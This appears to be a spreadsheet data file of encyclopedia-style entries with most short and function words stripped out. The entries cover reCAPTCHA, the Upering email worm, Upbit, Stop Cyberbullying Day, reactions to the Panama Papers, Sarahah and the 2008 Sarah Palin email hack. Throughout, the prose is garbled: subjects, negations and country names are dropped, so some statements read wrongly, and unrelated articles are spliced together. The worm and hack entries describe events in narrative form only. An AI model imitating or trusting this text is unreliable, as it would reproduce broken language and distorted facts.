effectively locking users pages service. however, recaptcha currently longest list accessibility considerations captcha service. interface variants captcha challenges, images incrementally highlighted, fade clicked, replaced image fading resembling whack-a-mole. criticism aimed long duration taken images fade derivative projects recaptcha also created project mailhide, protects email addresses pages harvested spammers. default, email address converted format allow crawler full email address; example, "mailme@example.com" would converted "mai...@example.com". visitor would click "..." solve captcha order obtain full email address. could also edit pop-up code none address visible. mailhide discontinued 2018 relied recaptcha references further reading dzieza, josh (february 2019). "why captchas gotten difficult". verge. schwab, katharine (june 2019). "google's recaptcha dark side". fast company. external links official website</t>
  </si>
  <si>
    <t>Upering</t>
  </si>
  <si>
    <t>upering (alias "annoyer.b", "sany") mass-mailing computer worm. isolated tacoma, washington, united states, several submissions america online members. late 2005, listed wildlist, since 2003. worm worm program makes facilitates distribution copies itself; example, disk drive another, copying using email another transport mechanism. worm damage compromise security computer. arrive exploitation system vulnerability clicking infected email. mass-mailing worm mailing worm (also known email worm less commonly known internet worm) distributes copies infectious email attachment. often, infected emails sent email addresses worm harvests files infected computer. isolation date july 2003 systems affected windows 2000, windows windows windows spread this type worm embedded e-mail attachment, spreads using infected computer's e-mailing networks. uses social engineering tactics entice user opening executing e-mail attachment. upering spreads sending email addresses instant message contacts address book. upering worm arrives attachment email instant message lines: here's pic!!! show mail click download download identify arrive email attachment named winupdate32login.exe. filename could differ depending original filename worm system email originated. effects sends notification message creators worm sends contacts address book, either email instant message. adds registry value recommendation avoid upering users avoid infection simply refusing open email file attachments without first verifying safety email sender. using firewall block incoming connections internet services publicly available. enforcing password policy. ensure programs users computer lowest level privileges necessary complete task. disable autoplay prevent automatic launching executable files network removable drives, disconnect drive required. turn file sharing needed. removal automatic action once detected, f-secure security product automatically disinfect suspect file either deleting renaming references external links symantec http://www.symantec.com/security_response/writeup.jsp?docid=2003-073012-2202-99&amp;tabid=2]</t>
  </si>
  <si>
    <t>Upbit</t>
  </si>
  <si>
    <t>upbit south korean cryptocurrency exchange founded 2017. operated dunamu, highest-valued startups south korea. history upbit launched south korea october 2017 help partnership american cryptocurrency exchange bittrex.sirgoo named dunamu, upbit’s parent company, december 2017, dunamu founder chi-hyung song assuming role chairman. previously served co-ceo kakao corp. joins, inc.approximately months launch, upbit became global cryptocurrency exchange terms 24-hour trading volume.on 2018 main office raided part fraud probe.the exchange began expanding southeast asia late 2018, first launching singapore october beginning services indonesia starting january 2019, thailand starting january 2021.on december 2018 three upbit officials indicted allegedly making fake orders. exchange denied allegations.in december 2018, upbit became first cryptocurrency exchange world receive certifications korea internet security agency information security management system (isms) international organization standardization (iso) information security (iso 27001), cloud security (iso 27017) cloud privacy (iso 27018).on november 2019 upbit lost $48.5 million worth ethereum hack.in september 2021, south korea started regulate virtual asset service providers. references external links official website</t>
  </si>
  <si>
    <t>Stop Cyberbullying Day</t>
  </si>
  <si>
    <t>stop cyberbullying international awareness launched cybersmile foundation june 2012, taking place third friday june annually. encourages people around world show commitment toward truly inclusive diverse online environment all, without fear personal threats, harassment abuse. brings together public figures, non-profit organizations, brands, governments educational institutions speak cyberbullying abuse kind defend human right freedom speech mutual respect. people show support using #stopcyberbullyingday hashtag social media along message. next stop cyberbullying june 2020. brand media involvement brands twitter, mtv, telenor, (esports) supported stop cyberbullying public announcements, social media posts celebrity engagements. telenor group announced would educate million children asia 2020 stop cyberbullying launch cyberhero" initiative. mcafee pledged support stop cyberbullying asked customers raise voice unite cyberbullying. released series videos coincide cybersmile foundation's stop cyberbullying public service announcement 2017 wrestlers show bayley encouraging internet users kind another. telus announced stop cyberbullying would donate every pledge made part nationwide initiative support #endbullying programs youth canada secure million pledges.superstroke launched fundraiser support cybersmile foundation golfer paige spiranac stop cyberbullying day, donating proceeds sales limited edition putter grips. research mark 2012, cybersmile foundation released research revealing teachers come across cyberbullying point career, revealing personally experienced cyberbullying, whether directed themselves, students members staff.on stop cyberbullying 2017, survey 50,000 internet users u.s. u.k. released. study explored bystander experiences cyberbullying online abuse. public service announcement 2017, cybersmile foundation released video stop cyberbullying host international stars calling cyberbullying. wrestlers show, bayley, teen youtube stars johnny orlando lauren orlando, daniel padilla, kathryn bernardo krista allen among celebrities involved project. thunderclap april 2018, cybersmile foundation launched thunderclap campaign stop cyberbullying promote kinder, inclusive internet. campaign supported number public figures, government departments brands around world including katie cassidy, stephen fry, charles sophy, zoella, jake zyrus, ub40, normani, claire’s, talktalk group, barclays, kingston technology, (esports), talking tom, born this foundation, dcms, mental health america vh1. june 2018, campaign went live social reach million internet users across facebook twitter. campaign promoted messages diversity inclusion online. popular culture 2015 capital summertime ball, artists show including little mix, nick jonas, jason derulo, camila cabello, kelly clarkson carly jepsen shared thoughts deal cyberbullying sugarscape ahead stop cyberbullying feel love fortnight campaign.david hasselhoff, william shatner, celine dion, direction, charlotte crosby mackenzie ziegler among host public figures participated stop cyberbullying day, contributing memes tweets support day. celebrity ambassadors fifth harmony normani kordei, member fifth harmony richard armitage (actor) paige spiranac katie cassidy stephanie harvey krista allen show bayley (wrestler) ub40 michael rosenbaum maya stojan gena nolin charisma carpenter daniel padilla kathryn bernardo stephen "snoopeh" ellis references external links stop cyberbullying website cybersmile foundation stop cyberbullying</t>
  </si>
  <si>
    <t>Reactions to the Panama Papers</t>
  </si>
  <si>
    <t>this article lists reactions responses countries official bodies regarding leak legal documents related offshore havens firm mossack fonseca, called panama papers. government reactions investigations argentina argentine president mauricio macri listed head trading company based bahamas disclose tenure mayor buenos aires; clear whether disclosure non-equity directorships required argentine law.on april 2016, federal prosecutor federico delgado began formal investigation macri's involvement fleg trading ltd., company registered panama president macri listed director. judge sebastián casanello asked start file inquiry. initial petition made neuquén representative darío martínez. martínez claims macri could guilty perjury omissions made sworn statement. martínez also referenced another offshore company, kagemusha (named akira kurosawa's 1980 film), established 1981 president macri also connections.on september 2017, civil judge andrés fraga determined company fleg trading ltd, bahamas, mauricio macri accepted position director appointed sole effect designating replacement resigning, kagemusha even accept tacitly position director appointed francisco macri. ruling adds neither companies shareholder, receive dividends profits, participate business decisions business, owner co-owner current bank account companies.the family argentine football player lionel messi announced file complaint reports accused assembling evasion network panama. family denied messi involved called accusations slanderous. they said company referred panama papers inactive messi declared income image rights proceedings argentine agency. armenia april 2016 hetq online reported according panama papers, major-general justice head armenia's compulsory enforcement service mihran poghosyan connected three panama-registered companies (sigtem real estates inc., hopkinten trading inc. bangio invest s.a., sole owner sigtem hopkinten). april armenian transparency international anti-corruption center filed petition ethics committee high level officials, requesting investigation poghosyan. members families poghosyan's uncles grigor mikhail haroutyunyan also mentioned connection business. australia australian taxation office announced investigating individual australian taxpayers mossack fonseca list clients cases referred country's serious financial crime task force. azerbaijan azerbaijani president ilham aliyev respond repeated requests comments.according icij website, "the family azerbaijan president ilham aliyev leads charmed, glamorous life, thanks part financial interests almost every sector economy. [aliyev's daughter] arzu, financial stakes firm rights mine gold western village chovdar azerfon, country's largest mobile phone business. arzu also significant shareholder holding, controls nearly every operation related azerbaijan airlines ("azal"), meals airport taxis. both sisters brother heydar property dubai valued roughly million 2010; heydar legal owner nine luxury mansions dubai purchased million." bangladesh according numerous media outlets, conglomerates thirty-two bangladeshi shareholders listed. business personalities include muhammed aziz khan, mohiuddin monem, samson chowdhury. awami league presidium member kazi zafarullah wife nilufar zafar said list.on april 2016, anti corruption commission bangladesh launched inquiry obtain details businesses individuals said evaders would brought trial punished. brazil politicians seven parties brazil named clients panama-based firm center massive data leak possible evasion. leaked files included politicians brazil's largest party, pmdb, broke away president dilma rousseff's coalition 2016. political figures psdb, prominent opposition party country, also mentioned leaks, well others pdt, psb, parties. politicians rousseff's workers' party mentioned leaks. research panama papers, group dutch journalists daily newspaper trouw, shown globo cited "many times" money laundering investigation nederlandsche bank revealed years media outlet conducted several "irregular financial transactions" havens order broadcast rights copa libertadores. british virgin islands british virgin islands mossack fonseca subjected 6-month investigation regulator, british virgin islands financial services commission. investigation fined us$440,000 breaches regulations countering terrorist financing regulations money laundering. fine highest ever levied regulator, short maximum fine power impose. canada canadian prime minister justin trudeau denied involvement leak, saying entirely completely transparent mine family’s finances. that something learned early canadians expect leaders." government ordered canada revenue agency find copies panama papers, order find canadians used offshore accounts avoid taxes.the royal bank canada david mckay announced bank team look back four decades documentation ties mossack fonseca. bill downe bank montreal also defended, saying "canadian banks 'dramatically' beefed anti-money laundering controls last seven years." also stated link canadian businesses panama papers would originated long time ago, time canadian banks took action stop money laundering. china relatives highly placed chinese officials including seven senior leaders former senior leaders politburo chinese communist party named, including former premier peng's daughter xiaolin, former communist party general secretary yaobang's dehua deng jiagui, brother-in-law current general secretary chinese communist party jinping. deng shell companies british virgin islands member politburo standing committee, dormant time became general secretary communist party (paramount leader) 2012. others named include daughter-in-law propaganda chief yunshan son-in-law vice-premier zhang gaoli. china's government suppressing mentions panama papers social media search engines results. china's communist party reportedly told news organizations delete content related panama papers leak. considering material concerted foreign media attack china, internet information offices immediately given verbal orders delete reprinted reports panama papers, follow related content without exceptions. hong lei, spokesman china's foreign ministry, responded comment" "such groundless accusations" april news conference.china third year anti-corruption campaign launched punished 300,000 party officials financial misdeeds created many enemies xi.chinese authorities blocked almost information panama papers chinese media internet. screenshot showed authority forced websites delete content panama papers. foreign websites wikileak, china digital times blocked mainland china. official media, like global times (huanqiu shibao) reported resignation prime minister iceland, media never mentioned panama papers caused resignation. sina weibo, twitter-like social media china, almost content panama papers deleted. because xi's brother-in-law named, panama canal well known, weibo users started "brother-in-law", "canal papers", tags avoid weibo's censor. because censorship mainland china, chinese people know panama papers. colombia national directorate taxes customs launched investigation clients mossack fonseca colombia, subsidiary mossack fonseca established 2009. 2014, colombia placed panama onto blacklist havens. cyprus central bank cyprus officially declared: "with regard press reports citing leaked documents, known panama papers, central bank cyprus announces assessing information extent concern cypriot banking system taking, necessary, appropriate action." cypriot online paper said "the cyprus link stems fact fonseca runs office cyprus and, specifically, limassol. chart, leaks name cyprus (countries offer little tax), although corporate rate 12.5%, ireland." czech republic october 2021, andrej babis campaigning another term country’s prime minister ahead polls. week first vote, october pandora papers revealed babis used shell company french chateau. czech requires dislosure purchase, failed despite running populilst often spoke corruption among country's elites. ended losing election. european union many senior figures implicated panama papers scandal. european commissioner taxation, pierre moscovici, said european union whole "duty" prevent kind avoidance uncovered panama papers scandal. moscovici told reporters offshore companies hide called "shocking amounts" financial assets authorities "unethical". estimated shelters resulted annual loss trillion public finances, adding european commission attempted tighten rules across union since november 2014 "luxleaks" avoidance scandal (also revealed icij), hoped extent panama papers revelations would spur countries action.in 2013 letter unearthed financial times then-president european council, herman rompuy, prime minister united kingdom david cameron said offshore trusts automatically subject transparency requirements shell companies. some analysts suggested actions affect outcome referendum membership egypt alaa mubarak, former president hosni mubarak, cited owning, holding companies, real estate properties london. france french financial prosecutors opened probe, president françois hollande declared evaders would brought trial punished. also result, france restored panama havens list, recently removed.jean-marie pen, founder long-time leader right-wing front national mentioned documents, along several aides daughter marine pen, current party leader. iceland april 2016, prime minister iceland sigmundur davíð gunnlaugsson announced resignation. reykjavík city council member júlíus vífill ingvarsson resigned earlier day.shortly initial reports sigmundur davíð's resignation, prime minister's office iceland issued statement international press saying sigmundur davíð resigned, rather stepped aside unspecified amount time would continue serve chairman progressive party. fall 2017, sigmundur davíð left progressive party created populist party called centre party. centre party received 10.9% vote icelandic parliamentary election held october 2017. india indian prime minister narendra modi ordered inquiry, subsequently indian government announced constituting special multi-agency group comprising officers investigative unit central board direct taxes foreign research division, financial intelligence unit reserve bank india. list contains names prominent indian actors, politicians businessmen allegedly stashed money offshore entities panama. some include bollywood megastar amitabh bachchan daughter-in-law actress aishwarya bachchan, promoter singh, apollo tyres chairman onkar kanwar, tractors farm equipment limited chairman mallika srinivasan iqbal mirchi, indian drug lord. indonesia finance minister, bambang p.s. brodjonegoro, immediately responded quickly leaked data evasion "panama papers" instructing directorate general taxation (dgt) follow findings. leaked investment data originating panama firm, mossack fonseca, attracted bambang's attention source information potential traced. "i've asked (dwijugiasteadi), director general taxation, please let's study data known panama papers", said headquarters dgt, tuesday (5/4). finance minister said potential property taxpayer around 4,000 trillion, affected tax. specifies, around 1,400 trillion, property taxed, remitted dgt, remaining 2,700 trillion, rich indonesian deposits banks abroad. israel some israeli companies israeli shareholders listed. among israeli names found leaked documents are: attorney weissglass, bureau chief late prime minister ariel sharon; jacob engel, businessman active african mining industry; idan ofer, member israel's wealthiest families, according haaretz. tareq abbas, mahmoud abbas, president palestinian authority, also revealed hold million shares offshore company associated palestinian authority.weissglass' name appears sole owner four companies business partner assaf halkin. company, talaville global, registered british virgin islands 2012, according haaretz, seven months later, shares mortgaged loan vienna bank. weissglass halkin told haaretz company "was registered purpose receiving loan bank order invest european properties. bank would allow loan corporation... [the] company activity reported authorities israel. required said activity paid israel." italy april 2016 italy's procura turin ordered guardia finanza investigate italians contained panama paper's documents. mexico aristóteles núñez, charge government's administration, servicio administración tributaria, said people involved panama papers case still make declarations taxes investments. being mexican foreign investments bank accounts crime, income declaring illegal. concealment income panama papers-related investments categorized evasion, fines 100% omitted payment result, well three months nine years imprisonment "tax crime".according forbes, "hinojosa prominent mexicans, mostly businessmen close ties government, including least member forbes billionaires list, subject extensive articles published line proceso aristegui noticias sunday coincide icij posting panama papers." zealand zealand's inland revenue department said working obtain details people residence country involved arrangements facilitated mossack fonseca.gerard ryle, director international consortium investigative journalists, told radio zealand april 2016 zealand well-known "nice front criminals". norway norwegian administration expects demand access information (norway's largest financial services group) approximately companies formed owned norwegians, living norway. norwegians client list mossack fonseca. pakistan three children prime minister nawaz sharif, maryam, hussein hassan, shown owning four companies among them.maryam nawaz denied charges official twitter account series tweets, saying: stated earlier, company/property abroad. brother made trustee corporations entitles distribute assets brother hussain's family/children needed. nothing brother already explained. info provided leaks wrongdoing involved. distortion wilful couple media channels using settle scores. samina durrani, mother-in-law chief minister shebaz sharif second marriage ilyas mehraj, brother-in-law first marriage also included documents.the leaks resulted high-profile case prime minister, nawaz sharif, supreme court pakistan returned verdict favor investigation sharif family's businesses. joint investigation team formed supreme court 2017 probe family's assets regard. render report court within days first session.on july 2017, results investigation, supreme court pakistan disqualified prime minister pakistan holding public office also permanently disqualified corruption case referred pakistan panama procuraduría nación announced open investigation concerning international journalistic investigation "panama papers", mossack fonseca involved. minister presidency, alvaro alemán categorically rejects panama considered ruled permit used country "scapegoat", thus reacting scandal "panama papers" subsequent re-registration france list havens. alemán criticized vigorously statements made secretary general organisation economic co-operation development (oecd) josé ángel gurría minister finance france, michael sapin considered disrespectful irresponsible, especially publications speak total jurisdictions, lash panama. alemán explained talks started french ambassador panama, issue discussed preliminarily establish avenues understanding clarify situation implicated country. eduardo morgan, panamanian firm morgan morgan accuses oecd behind campaign avoid competition panama represents interests countries. panama papers serious issue panama affects "unfair" manner country's image result investigation, "hack". this stated april adolfo linares, president chamber commerce, industries agriculture panama (cciap). colegio nacional abogados panama (cna) urged panamanian government anyone affected country's image massive leak documents linking panamanian firm mossack fonseca creation companies move capital evading taxes. political analyst mario rognoni said panama affected whole scandal 'panama papers'. said world pointing panama depend policies adopted authorities. government president juan carlos varela, believes might involved tries cover responsibility involved. economist rolando gordon said hurts country emerged gray list fatf. could panama modify law, said. explained time seen scandal, country, especially panama conduct investigations determine whether true illegal improper acts committed. panama's lawyers movement listed 'cyber bullying international cyberterrorism' scandal called 'panama papers'. press conference, guild primarily condemned attack country brand 'panama'. fraguela alfonso, president movement, said doubt direct attack country's financial system.'i invite organized forces country create great crusade rescue country's image, said.he said panama panamanian corporations widely used panamanians.the firm rubio, alvarez, solis abrego also reacted press release detailing recent decades panama financial important services latin america world plazas. product kinds attacks service system 'are encouraged.' establishment offshore company legal. lawyer excontralor republic alvin weeden explained illegal product created sold others used money laundering arms smuggling, terrorism, evasion. this case published twitter: 'its like create atomic bomb, sell another country detonate another country'. russia süddeutsche zeitung, made papers public, described connections various individuals listed papers russian president vladimir putin. according newspaper, release papers confirms previous descriptions russia kleptocratic "mafia state" putin inner circle. vladimir putin appear records names many associates construction billionaires arkady boris rotenberg, well professional musician sergei roldugin business magnate alisher usmanov. papers also list billionaire gennady timchenko, putin's press secretary's spouse, cousin, putin's former colleagues, several oligarchs owning offshore shell companies. 2011 putin criticized offshore companies "unpatriotic".the documents leaked indicated sergei roldugin, professional cellist described novaya gazeta vladimir putin's best friend godfather eldest daughter, acquired assets worth least $100 million, including 12.5% stake video international, russia's largest television advertising firm. also revealed roldugin acquired assets described "suspicious deals".putin spokesperson dmitry peskov said western mainstream media reporting panama papers engaged "putinophobia". said primary target leak vladimir putin panama papers part conspiracy russia, orchestrated central intelligence agency, united states department state others.president putin denied "any element corruption" panama papers leaks, saying opponents trying destabilise russia.initially, aside independent outlets, russian media entirely ignored leak. channel rossiya state owned, mention panama papers april story broke. when opposition politician asked media ignoring story, dmitry kiselev, head rossiya segodnya, refused discuss comment. extent coverage given story often done middle night, focused exclusively international celebrities rather links putin's circles found papers. coverage leak began appear peskov's reaction, generally focused peskov's comments rather discussing information panama papers. saudi arabia crown prince muhammad nayef also named association papers. singapore ministry finance monetary authority singapore said statement "singapore takes serious view evasion tolerate business financial centre used facilitate related crimes. evidence wrongdoing individual entity singapore, hesitate take firm action." sweden swedish financial supervisory authority (fi) said april 2016 would launch investigation actions nordea, largest financial institutions nordic countries, panama papers revealed company's luxembourg office helped nearly offshore companies clients. later informed investigate also three banks sweden: handelsbanken, swedbank. nordea ties mossack fonseca following interview nordea casper koskull april pointed "serious deficiencies" nordea monitors money laundering given bank warnings. 2015 nordea largest possible fine million eur. thailand bangkok post said "...anti-money laundering office (amlo) seeking information foreign counterparts regarding twenty-one thai nationals reportedly included list people worldwide using panama-based firm apparently specializing money laundering evasion. clear amlo investigating twenty one. panama papers include least names individuals based thailand another fifty companies based thailand. some foreigners foreign-owned companies individual addresses thailand appear documents surfaced date, including ceos giant companies bangkok land phatra finance. tunisia tunis trial court prosecutor ordered judicial inquiry opened panama papers tunisian political figures suspected hiring firm. judge financial judiciary pole tunisian specialized court financial crimes assigned case. tunisian assembly representatives people established parliamentary commission inquiry well ukraine when ukrainian president petro poroshenko office 2014, pledged sell candy business (roshen) elected, leaked documents indicate august 2014 instead mossack fonseca offshore holding company prime asset partners british virgin islands moved company there, roughly months election. move potential save millions dollars ukrainian taxes. records cyprus show firm's shareholder.anti-corruption group transparency international believes "creation businesses serving president direct violation constitution". also, journalists organized crime corruption reporting project believe move poroshenko committed illegalities, starting business office failing afterwards report disclosure statements.poroshenko denied wrongdoing spokesman said offshore company active assets legitimate corporate restructure aimed helping sell poroshenko's roshen group. analysts ukraine responded secretive poroshenko accounts certain undermine trust him, party ukraine itself.the news poroshenko's offshore business came government campaigned offshore companies. oleh lyashko, leader radical party, urged lawmakers begin impeachment proceedings, even allies backed calls parliamentary commission investigate allegations.in ukrainian parliament, relations poroshenko bloc people's front party prime minister arseniy yatsenyuk previous months already soured, mutual accusations corruption.the allegations threw gasoline long-running allegations corruption impropriety poroshenko's behalf, thought large reason, although chief one, poroshenko lost reelection bid. united arab emirates icij, guardian independent reported president khalifa zayed nahyan owns london real estate worth £1.2 billion structure thirty shell companies mossack fonseca british virgin islands administer him, using manage control luxury properties london. december 2015, mossack fonseca held nearly shares companies trust structures behalf, president wife, daughter trust beneficiaries. united kingdom according guardian, "more £170bn property held overseas. nearly 31,000 companies british property linked mossack fonseca." british property purchases worth £180 million investigated 2015 likely proceeds corruption almost bought offshore companies. two-thirds purchases made companies registered four british overseas territories crown dependencies operate havens jersey, guernsey, isle british virgin islands (bvi) according land registry data obtained private magazine freedom information requests. seller's market sent prices skyrocketing reach many londoners.included among papers names members house lords, several donors cameron's conservative party, conservative donors. this included: anthony bamford: million conservative party donations, made conservative life peer 2013; david rowland: £3.8 million conservative party donations, former party treasurer; fleming family partners: over £400,000 conservative party donations, including direct donations david cameron; juniper equities trading: £250,000 loan conservative party offshore fund opaque ownership structure; tony buckingham: £100,000 donation conservative party.as united kingdom still exercises varying degrees control british overseas territories crown dependencies make large number many havens "secrecy jurisdictions" exist, pressure mounted prime minister david cameron make changes. according wall street journal, panama papers "are shining light constellation offshore centers last remnants british empire, gibraltar british virgin islands." companies handled mossack fonseca included leaked data, british overseas territory topped list, 113,000 nearly 215,000 companies mossack fonseca managed incorporated there. british overseas territory anguilla list.cameron criticized complex offshore structures 2012, saying "not fair right", summit 2013 demanded transparency, saying would better business. 2014, cameron asked overseas territories crown dependencies set-up open register firms individuals investments registered jurisdictions, time panama papers leak april 2016, montserrat gibraltar agreed so.leader opposition jeremy corbyn, said "the government needs stop pussyfooting around dodging" called "direct rule" imposed british overseas territories crown dependencies havens, move former business secretary vince cable agreed with, although former attorney general dominic grieve described "bit nuclear option" would "destroy livelihoods" inhabitants finance industry. labour party also said cameron's plans "anti-corruption" summit would charade" cameron, chairman summit, require representatives crown dependencies overseas territories attend.jennie granger, spokeswoman hmrc said department received great deal information offshore companies, including panama, wide range sources, currently subject intensive investigation". said hmrc asked icij share data. private guardian revealed edward troup, appointed executive chair hmrc april 2016, former partner simmons simmons, london-based legal firm whose clients included panama-registered fund created david cameron's father, blairmore holdings. papers obtained süddeutsche zeitung icij reveal simmons simmons' close relationship running offshore companies major overseas property owners, including investment company behalf sheikh hamad abdullah thani, troup senior partner.by november 2016 reported total people subjected investigation hmrc relating potential evasion result panama papers, "under review". blairmore holdings, inc. cameron, late father prime minister david cameron, offshore fund (blairmore holdings, inc.) mossack fonseca avoided taxes years. company moved ireland david cameron became prime minister. april cameron admitted owned shares blairmore, sold shares becoming pm.prominent politicians criticized involvement cameron family scandal; leader opposition jeremy corbyn urged immediate independent investigation affairs cameron's family well tighter laws avoidance. opponents also called cameron's resignation admitted owning shares blairmore. united states president barack obama critical caribbean havens 2008 election campaign. 2010, united states implemented foreign account compliance act; required financial firms around world report accounts held citizens internal revenue service. former secretary state democratic presidential front-runner hillary clinton condemned "outrageous havens loopholes panama elsewhere". pennsylvania afl–cio event. clinton added "some behavior clearly law, everyone violates anywhere held accountable", "scandalous much actually legal". clinton promised going scams make sure everyone pays fair share america."the hand refused common reporting standard organisation economic co-operation development, alongside vanuatu bahrain. this means receives asset information american assets income abroad, share information happens united states countries, words become attractive haven. panama free trade agreement panama free trade agreement, supported obama clinton, accused enabling practices detailed within panama papers regulatory oversight. however, obama administration official said argument "zero merit". john cassidy yorker says panama free trade agreement actually forced panama release information american regulatory authorities "the ownership companies, partnerships, trusts, foundations, persons".citing leaked diplomatic cables, fortune writer chris matthews speculated obama clinton supported agreement, opposing campaigning office, quid panamanian support efforts drug trafficking. event, notes, true agreement abolished limits fund transfers panama, obama administration insisted countries first sign information exchange agreement well, facilitated exchange information countries. after leak president barack obama addressed overseas shell companies listed leak press conference: "it's they're breaking laws," said, "it's laws poorly designed allow people, they've enough lawyers enough accountants, wiggle responsibilities ordinary citizens abide by." although leader mentioned panama papers, obama said "frankly, folks america taking advantage stuff". senators sherrod brown elizabeth warren requested treasury department investigate us-linked companies appeared leaks, members house representatives state york (democratic representative carolyn maloney high-ranking member house banking committee republican representative peter king) introduced incorporation transparency enforcement assistance act, proposed bill would: ...ensure persons form corporations limited liability companies united states disclose beneficial owners corporations limited liability companies, order prevent wrongdoers exploiting united states corporations limited liability companies criminal gain, assist enforcement detecting, preventing, punishing terrorism, money laundering, misconduct involving united states corporations limited liability companies, purposes. according fair observer: "the contains many reasonable exemptions, including public corporations (who already registers beneficial owners); churches non-profits; owners businesses employees, million annual revenues physical presence office." however, bill faced resistance national association secretaries state, concerned loss revenue burden regulation. nass also called "existing solutions" used combat issue, saying "federal legislation work".jürgen mossack testified oath m.f. corporate services (nevada) ltd. affiliation panamanian mossack fonseca, panama papers show fact wholly owned subsidiary tried hide relationship, ordering emails computer footprints deleted. firm fighting order turn details shell companies created associate former president argentina.manhattan attorney preet bharara opened criminal investigation matters related panama papers sent letter april international consortium investigative journalists (icij) saying office "would greatly appreciate opportunity speak soon possible." icij received many requests many countries icij director gerard ryle said policy turn materials. americans mcclatchy newspapers, participating news organization investigation, found four americans offshore shell companies named documents. previously either accused convicted financial crimes fraud evasion. three reasons suggested explain paucity americans leak: shell companies created united states, major international banks based america tend offshore accounts cayman islands instead laws like foreign account compliance (fatca) information exchange agreements (tieas) 2010 meant "tax evasion game [was] principally american taxpayers."asked paucity american individuals documents, digital editor süddeutsche zeitung, stefan plöchinger, said twitter: "just wait coming next." plöchinger later clarified advocating jumping conclusions.new york's department financial services asked foreign banks, including deutsche bank credit suisse group commerzbank amro group societe generale information dealings mossack fonseca. banks accused wrongdoing must provide telephone logs records transactions york branches firm.copies least american passports indicating owners applied banking services discovered papers, politicians named leak.the names americans however mentioned: puerto rican recording artist ramón luis ayala, better known daddy yankee, appears leaked documents. chairman citibank (1998-2006) sanford weill appears documents sole shareholder april fool, company based british virgin islands managed yacht name 2001-2005. weill's second company, brightao, includes chinese american investors holds share chinese insurance risk-management firm, mingya insurance brokers. jerry slusser, fundraiser republican mitt romney, initially said recall opening offshore company, called accountant said investment hong kong eventually showed loss. declined provide detail. numerous donors clinton foundation, including many foreign nationals. venezuela josmel ve</t>
  </si>
  <si>
    <t>Sarahah</t>
  </si>
  <si>
    <t>sarahah (arabic: صراحة, romanized: ṣarāḥa) saudi arabian social networking service providing constructive feedback. arabic, sarahah means "frankness" "honesty". created zain-alabdin tawfiq 2016 reached sudden worldwide success mid-2017. this growth considered deeply related release snapchat update allowed people share urls snaps.sarahah allowed people text messages others person reading could reply anonymously. initially, meant workers compliment bosses. released apple store june 2017, also users several countries including canada, india, lebanon. update released snapchat july within weeks, number position. rise also seen google trends report.on august 2017, reported sarahah mobile quietly uploads user's address book servers.spam frequent, sent third-party apps claiming able reveal usernames anonymous senders.on january 2018, reported woman queensland, australia started petition others like banned, friends 13-year-old daughter sent abusive messages, including ones suggesting kill herself. news report australian special broadcasting service (sbs) stated child's mother, katrina, "called apple's store google play stop downloads sarahah, allows people leave anonymous feedback other". february, katrina posted message declaring success, saying apple google removed stores. december 2021, zain-alabdin tawfiq announced twitter: "...i regret share we're shutting sarahah platform thank helping achieve unprecedented growth making proud, support patience hope again..." this retweeted sarahah's twitter account. notable uses ngos indian ngo, ungender, used sarahah tackle issue sexual harassment also anonymous social media ask.fm service used anonymous, linked several teen suicides 2013 secret (app) similar service shut 2015 references external links official website</t>
  </si>
  <si>
    <t>Sarah Palin email hack</t>
  </si>
  <si>
    <t>sarah palin email hack occurred september 2008, 2008 united states presidential election campaign vice presidential candidate, sarah palin's, yahoo! personal email account subjected unauthorized access. hacker, david kernell, obtained access palin's account looking biographical details, high school birthdate, using yahoo!'s account recovery forgotten passwords. kernell posted several pages palin's email 4chan's board. kernell, time offense 20-year-old college student, longtime democratic state representative mike kernell memphis. kernell charged october 2008 federal court. after court irons handcuffs, judge released recognizance, pending trial. incident ultimately prosecuted u.s. federal court four felony crimes punishable years federal prison. charges three felonies: identity theft, wire fraud, anticipatory obstruction justice; optional felony misdemeanor: intentionally accessing account without authorization. kernell pleaded guilty counts. jury trial, featuring testimony sarah bristol palin, well 4chan founder christopher poole, began april 2010. jury found kernell guilty counts: felony anticipatory obstruction justice misdemeanor unauthorized access computer. facebook page, sarah palin stated family thankful jury rendered verdict.kernell sentenced november 2010, year plus federal custody, followed three years supervised release. sentencing judge recommended custody served halfway house, federal bureau prisons sent instead minimum security prison. released november 2011. january 2012, united states court appeals sixth circuit found kernell's awareness possible future investigation enough uphold conviction obstruction justice. incident shortly midnight september 2008, private yahoo! mail account sarah palin cracked 4chan user. hacker, known "rubico", claimed read palin's personal e-mails looking something "would derail campaign."after reading palin's emails, rubico wrote, "there nothing there, nothing incriminating personal stuff, clerical stuff governor." rubico wrote used sarah palin wikipedia article find palin's birth date (one standard security questions used yahoo!.) seconds." hacker posted account's password /b/, image board 4chan, screenshots within account wikileaks. user logged changed password, posting screenshot sending email friend palin's informing password thread. this criticized heavily community, "white knight". however, blank password screenshot. multitude users attempted password, account automatically locked yahoo!. incident criticized users, complained "seriously, /b/. could changed history failed, epically." hacker admitted worried caught, writing "yes behind proxy, one, sh*t ever f**ked, panicked, still wanted stuff posted [information] promptly deleted everything, unplugged internet comatose state."the hacker left behind traces activity. address logged proxy used, ctunnel.com, also left email address rubico10@yahoo.com posted 4chan. furthermore, attacker revealed original address used proxy leaving information screenshot according experts also help investigation. 4chan's board archived, posts retained short time. however, great interest surrounding posts rubico, many, including magazine wired, archived original posts. email address left behind connected david kernell various social networking profiles used, though official investigation took place time. campaign response john mccain's campaign condemned incident, saying "shocking invasion governor's privacy violation law". barack obama's spokesman bill burton called hacking "outrageous". federal investigation secret service began investigating incident september revealed questioning david kernell, 20-year-old economics student university tennessee democratic tennessee state representative mike kernell memphis. handle used hacker making post 4chan pointed him, although evidence inconclusive frequent pranks pulled board. hacker's proxy service provided logs, pointed kernell's residence.fbi agents served federal search warrant david kernell's apartment knoxville. agents spent hours taking pictures everything inside apartment. kernell's three roommates also subpoenaed expected testify following week chattanooga. obstruction justice charge stems allegation kernell attempted erase evidence crime hard drive. kernell's father told wired aware suspect, anything concerns testify court. indictment second federal grand jury knoxville returned indictment kernell october 2008. charged violating u.s.c. 1030(a)(2)(c) 2701, unlawful access stored communications intentionally accessing computer without authorization across state lines, respectively. kernell turned next day. kernell pleaded guilty. court released kernell recognizance. kernell's attorney claimed using e-mail address birth date constitute identity theft"; however, court rejected argument saying "once governor palin chose yahoo! gov.palin@yahoo.com, became unique address, else could choose it." trial october 2008, kernell brought court handcuffs ankle shackles plead guilty hacking released bond. case went trial eighteen months later, april 2010. april sarah palin testified minutes. daughter, bristol, testified well. following conclusion testimony, sarah said, think need consequences behavior." verdict sentence april 2010, david kernell found guilty four counts: felony anticipatory obstruction justice destruction records found lower misdemeanor option unauthorized access computer. jury acquitted 